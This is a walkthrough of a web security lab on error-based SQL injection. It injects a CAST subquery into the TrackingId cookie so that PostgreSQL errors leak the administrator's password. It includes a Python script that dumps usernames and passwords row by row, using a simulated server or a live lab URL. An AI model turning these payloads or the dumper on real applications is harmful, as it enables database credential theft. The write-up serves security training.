13 - Visible error-based SQL injection
The database contains a different table called users, with columns called username and password. To solve the lab, find a way to leak the password for the administrator user, then log in to their account.
Given: injection point (the TrackingId cookie), attack type (blind, but with a visible error message), table (users), columns (username, password)
End goal: log in as the administrator user
The initial request looks like this -
The challenge states that the vulnerable parameter is TrackingId. Appending a single quote (') to the TrackingId value returns a 500 Internal Server Error -
The response also contains a visible error message showing the SQL query that caused it -
Now we know how and where to read the error message in the response. The message is truncated after a fixed number of characters, so the payload has to stay short. The following value injected into TrackingId extracts the password - 'and CAST((SELECT password FROM users LIMIT 1) AS bool);
This query tries to convert the password to a boolean. The cast fails, and the database reports the offending value in the error message, so the password appears in the response -
(Luckily it is the administrator's password. If it were not, we would have to extract the other rows of the table one at a time.)
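The same technique, automated as an added example (this is not the lab author's code or the original payload): it walks the users table row by row with LIMIT 1 OFFSET n, forces each cell through a CAST to int, and parses the leaked value out of the PostgreSQL error. The cast-to-int form with a trailing -- comment, the users table contents, the lab URL and the length at which the error is cut off are all assumptions; fake_lab_response stands in for the lab server so the script runs offline.

```python
import re
import urllib.error
import urllib.request
from typing import Callable, Optional

# Constructed sample rows standing in for the lab's users table (values are made up).
FAKE_USERS = [("wiener", "peter"), ("administrator", "hunter2"), ("carlos", "montoya")]

# The lab cuts the visible error off after a fixed number of characters; this budget is an assumption.
ERROR_DISPLAY_LIMIT = 120

# PostgreSQL wording for a failed text-to-integer/boolean cast, which the lab echoes back verbatim.
CAST_ERROR = re.compile(r'invalid input syntax for type (?:integer|boolean): "([^"]*)"')


def build_payload(column: str, offset: int) -> str:
    """Cookie value that makes the database try to cast one cell of users to int.

    LIMIT 1 OFFSET n picks row n; the trailing -- comments out the application's own closing quote.
    The original TrackingId value is dropped entirely to keep the payload short.
    """
    return f"' AND 1=CAST((SELECT {column} FROM users LIMIT 1 OFFSET {offset}) AS int)--"


def fake_lab_response(tracking_id: str) -> str:
    """Stand-in for the lab server: emulates the PostgreSQL error the real application would show."""
    sql = f"SELECT * FROM tracking WHERE id = '{tracking_id}'"
    m = re.search(r"SELECT (\w+) FROM users LIMIT 1 OFFSET (\d+)\) AS int\)--'$", sql)
    if not m:
        # Anything that does not comment out the closing quote leaves the string literal open.
        return f"Unterminated string literal in SQL {sql}. Expected char"[:ERROR_DISPLAY_LIMIT]
    column, offset = m.group(1), int(m.group(2))
    if offset >= len(FAKE_USERS):
        return "Welcome back"  # subquery yields NULL, the cast succeeds, no error is raised
    value = FAKE_USERS[offset][0 if column == "username" else 1]
    return f'ERROR: invalid input syntax for type integer: "{value}"'[:ERROR_DISPLAY_LIMIT]


def http_send(url: str) -> Callable[[str], str]:
    """Real transport (assumed lab URL): send the payload as the TrackingId cookie, return the body."""
    def send(tracking_id: str) -> str:
        req = urllib.request.Request(url, headers={"Cookie": f"TrackingId={tracking_id}"})
        try:
            with urllib.request.urlopen(req) as resp:
                return resp.read().decode(errors="replace")
        except urllib.error.HTTPError as e:  # the lab answers 500 when the query fails
            return e.read().decode(errors="replace")
    return send


def extract_cell(send: Callable[[str], str], column: str, offset: int) -> Optional[str]:
    """Return the leaked value of users[offset].column, or None when that row does not exist."""
    body = send(build_payload(column, offset))
    m = CAST_ERROR.search(body)
    if m:
        return m.group(1)
    if "invalid input syntax" in body:
        # The error fired but the quoted value fell past the display limit: shorten the payload.
        raise RuntimeError("error message truncated before the leaked value")
    return None


def dump_users(send: Callable[[str], str], max_rows: int = 50) -> dict:
    """Walk the users table one row at a time until the subquery stops producing a value."""
    creds = {}
    for offset in range(max_rows):
        username = extract_cell(send, "username", offset)
        if username is None:
            break
        creds[username] = extract_cell(send, "password", offset)
    return creds


if __name__ == "__main__":
    # Swap fake_lab_response for http_send("https://<lab-id>.web-security-academy.net/") to run it live.
    for user, password in dump_users(fake_lab_response).items():
        print(f"{user}: {password}")
```

Casting to int instead of bool and dropping the original cookie value both keep the payload short, which matters because the visible error is cut off after a fixed length; extract_cell raises when the error fired but the value was cut, so a truncated leak is not mistaken for an empty row.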
Go to My account and log in to the administrator account using the password above.
Lab solved :